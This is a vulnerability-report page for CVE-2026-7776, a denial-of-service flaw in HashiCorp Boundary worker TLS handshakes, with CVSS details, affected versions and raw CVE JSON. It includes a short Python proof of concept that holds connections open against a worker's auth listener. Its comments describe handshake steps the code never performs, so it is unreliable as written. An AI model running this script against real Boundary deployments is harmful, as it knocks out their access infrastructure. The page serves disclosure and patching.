Security Vulnerability Report
CVE-2026-7776 CVSS 7.5 HIGH

CVE-2026-7776

Published: 2026-05-04 22:16:20
Last Modified: 2026-05-05 20:24:05

Description

Boundary Community Edition and Boundary Enterprise (“Boundary”) workers are vulnerable to a denial-of-service condition during node enrollment TLS handshakes. An attacker with network access to the worker authentication listener may open a connection and delay or withhold the client certificate during the TLS handshake, causing worker connection handling to block. This may prevent legitimate worker connections from being accepted or routed. This vulnerability, CVE-2026-7776, is fixed in Boundary 0.21.3, 0.20.3, 0.19.5.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

HashiCorp Boundary < 0.19.5
HashiCorp Boundary 0.20.0 - 0.20.2
HashiCorp Boundary 0.21.0 - 0.21.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import ssl
import time

# Target configuration
TARGET_HOST = 'boundary-worker.example.com'
TARGET_PORT = 9202  # Default worker auth listener port


def exploit_dos():
    try:
        # Establish a TCP connection
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((TARGET_HOST, TARGET_PORT))

        # Wrap socket with SSL context but do not complete handshake fully or send cert
        # In a real exploit, we might start the handshake and pause
        context = ssl.create_default_context()

        # Attempt to wrap, which initiates handshake
        # Depending on implementation, simply holding the socket open might trigger the bug
        # if the server expects a cert and blocks waiting for it.

        # Simulate holding the connection open without sending client cert
        print(f"[+] Connection established to {TARGET_HOST}:{TARGET_PORT}")
        print("[*] Holding connection open to block worker thread...")

        # Keep the connection open indefinitely to consume the worker slot
        while True:
            time.sleep(1)
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()


if __name__ == '__main__':
    exploit_dos()
```

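References

https://discuss.hashicorp.com/t/hcsec-2026-11-boundary-workers-vulnerable-to-denial-of-service-during-tls-handshake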

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-7776",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-04T22:16:20.330",
    "lastModified": "2026-05-05T20:24:04.853",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Boundary Community Edition and Boundary Enterprise (“Boundary”) workers are vulnerable to a denial-of-service condition during node enrollment TLS handshakes. An attacker with network access to the worker authentication listener may open a connection and delay or withhold the client certificate during the TLS handshake, causing worker connection handling to block. This may prevent legitimate worker connections from being accepted or routed. This vulnerability, CVE-2026-7776, is fixed in Boundary 0.21.3, 0.20.3, 0.19.5."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-770"}]
      }
    ],
    "references": [
      {
        "url": "https://discuss.hashicorp.com/t/hcsec-2026-11-boundary-workers-vulnerable-to-denial-of-service-during-tls-handshake",
        "source": "[email protected]"
      }
    ]
  }
}
```